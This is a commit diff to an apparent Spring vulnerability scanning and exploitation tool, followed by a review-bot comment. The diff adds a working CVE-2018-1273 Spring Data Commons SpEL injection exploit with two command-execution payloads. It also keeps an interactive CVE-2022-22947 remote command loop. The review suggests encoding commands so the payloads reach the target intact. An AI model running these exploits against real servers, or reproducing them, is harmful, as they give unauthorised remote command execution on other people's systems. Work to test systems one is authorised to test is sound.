
Commit 2717d08

authored
Update vul.py
1 parent 4fe8b2d commit 2717d08

1 file changed

+58
-9
lines changed


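--- a/inc/vul.py
+++ b/inc/vul.py
@@ -1,5 +1,8 @@
 #!/usr/bin/env python
 # coding=utf-8
+################
+# AabyssZG #
+################
 
 import requests, sys, json, re, random, base64
 from termcolor import cprint
@@ -135,9 +138,9 @@ def CVE_2022_22947(url, proxies):
 
 try:
 requests.packages.urllib3.disable_warnings()
-re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload, headers=headers1, json=json ,verify=False, proxies=proxies)
-re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2 ,verify=False, proxies=proxies)
-re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2 ,verify=False, proxies=proxies)
+re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload, headers=headers1, json=json, timeout=10 ,verify=False, proxies=proxies)
+re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
+re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
 if ('uid=' in str(re3.text)) and ('gid=' in str(re3.text)) and ('groups=' in str(re3.text)):
 cprint("[+] Payload已经输出,回显结果如下:", "red")
 print('\n')
@@ -147,14 +150,14 @@ def CVE_2022_22947(url, proxies):
 while 1:
 Cmd = input("[+] 请输入要执行的命令>>> ")
 if Cmd == "exit":
-re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2 ,verify=False, proxies=proxies)
-re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2 ,verify=False, proxies=proxies)
+re4 = requests.delete(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
+re5 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
 sys.exit(0)
 else:
 payload3 = payload2.replace('whoami', Cmd)
-re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload3, headers=headers1, json=json ,verify=False, proxies=proxies)
-re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2 ,verify=False, proxies=proxies)
-re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2 ,verify=False, proxies=proxies)
+re1 = requests.post(url=url + "actuator/gateway/routes/hacktest", data=payload3, headers=headers1, timeout=10, json=json ,verify=False, proxies=proxies)
+re2 = requests.post(url=url + "actuator/gateway/refresh", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
+re3 = requests.get(url=url + "actuator/gateway/routes/hacktest", headers=headers2, timeout=10 ,verify=False, proxies=proxies)
 result = re3.text
 cprint(result ,"green")
 print('\n')
@@ -356,6 +359,51 @@ def Eureka_xstream_RCE(url,proxies):
 f2.write(str(e) + '\n')
 f2.close()
 
+def CVE_2018_1273(url,proxies):
+cprint("======开始对目标URL进行Spring_Data_Commons远程命令执行漏洞测试======","green")
+Headers = {
+"User-Agent": random.choice(ua),
+"Content-Type": "application/x-www-form-urlencoded"
+}
+path1 = 'users'
+path2 = 'users?page=0&size=5'
+payload1 = "username[#this.getClass().forName(\"java.lang.Runtime\").getRuntime().exec(\"whoami\")]=chybeta&password=chybeta&repeatedPassword=chybeta"
+payload2 = "username[#this.getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"java.lang.Runtime.getRuntime().exec('whoami')\")]=asdf"
+try:
+requests.packages.urllib3.disable_warnings()
+urltest1 = url + path1
+urltest2 = url + path2
+re1 = requests.get(url=urltest1, headers=Headers, timeout=6, allow_redirects=False, verify=False, proxies=proxies)
+code1 = re1.status_code
+if ((int(code1) == 200) and ('Users' in str(re1.text))):
+cprint("[+] 发现Spring_Data_Commons远程命令执行漏洞:", "red")
+cprint('漏洞存在路径为 ' + urltest1 + '\n', "red")
+print("[+] 执行命令模块(输入exit退出)")
+choose = input("[+] 总共有两种Payload,请输入1或者2>>> ")
+while 1:
+Cmd = input("[+] 请输入要执行的命令>>> ")
+if (choose == '1'):
+payload3 = payload1.replace('whoami', Cmd)
+else:
+payload3 = payload2.replace('whoami', Cmd)
+if Cmd == "exit":
+sys.exit(0)
+else:
+re2 = requests.post(url=urltest2, data=payload3, headers=Headers, timeout=10, verify=False, proxies=proxies)
+code2 = re2.status_code
+if (int(code2) != 503):
+cprint('[+] 该Payload已经打出,由于该漏洞无回显,请用Dnslog进行测试\n', "red")
+else:
+cprint("[-] 未发现Spring_Data_Commons远程命令执行漏洞\n", "yellow")
+except KeyboardInterrupt:
+print("Ctrl + C 手动终止了进程")
+sys.exit()
+except Exception as e:
+print("[-] 发生错误,已记入日志error.log\n")
+f2 = open("error.log", "a")
+f2.write(str(e) + '\n')
+f2.close()
+
 def vul(url,proxies):
 functions = {
 1: CVE_2021_21234,
@@ -366,14 +414,15 @@ def vul(url,proxies):
 6: JolokiaRCE,
 7: JeeSpring_2023,
 8: Eureka_xstream_RCE,
+9: CVE_2018_1273,
 }
 cprint("[+] 目前漏洞库内容如下:","green")
 for num, func in functions.items():
 print(f" {num}: {func.__name__}")
 try:
 choices = input("\n请输入要检测的漏洞 (例子:1,3,5 直接回车即检测全部漏洞): ")
 if choices == '':
-choices = "1,2,3,4,5,6,7,8"
+choices = "1,2,3,4,5,6,7,8,9"
 choices = [int(choice) for choice in choices.split(',')]
 except Exception as e:
 print("请不要输入无意义的字符串")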
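Review bot: In the new `CVE_2018_1273`, the operator's command is spliced into an `application/x-www-form-urlencoded` body with a bare `str.replace`, so a command containing `&`, `=`, `+` or `%` is split or mis-decoded by the server's form parser (and a quote character closes the SpEL/JS string literal), yet the loop still prints the "payload delivered" message because only a non-503 status is checked. Encoding the command before substitution, `payload3 = payload1.replace('whoami', quote(Cmd, safe=''))` with `from urllib.parse import quote` added to the import line (that line is in the first hunk, not in scope here), covers the form-encoding part; quotes inside the command remain unhandled and deserve a comment saying so. The message `[+] 发现Spring_Data_Commons远程命令执行漏洞:` is printed on any 200 response whose body contains `Users`, before a payload has been sent, which is a fingerprint match rather than a confirmed vulnerability — wording it as "possible" and pointing at the DNSlog step that the code itself names as the only confirmation would avoid false reports. `choose` is read once and anything other than `'1'` silently selects the second payload; a re-prompt such as `while choose not in ('1', '2'):` would stop a typo from sending the wrong one. The `vul` dispatch-table and default-choices edits in the last hunk are consistent with the new entry.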
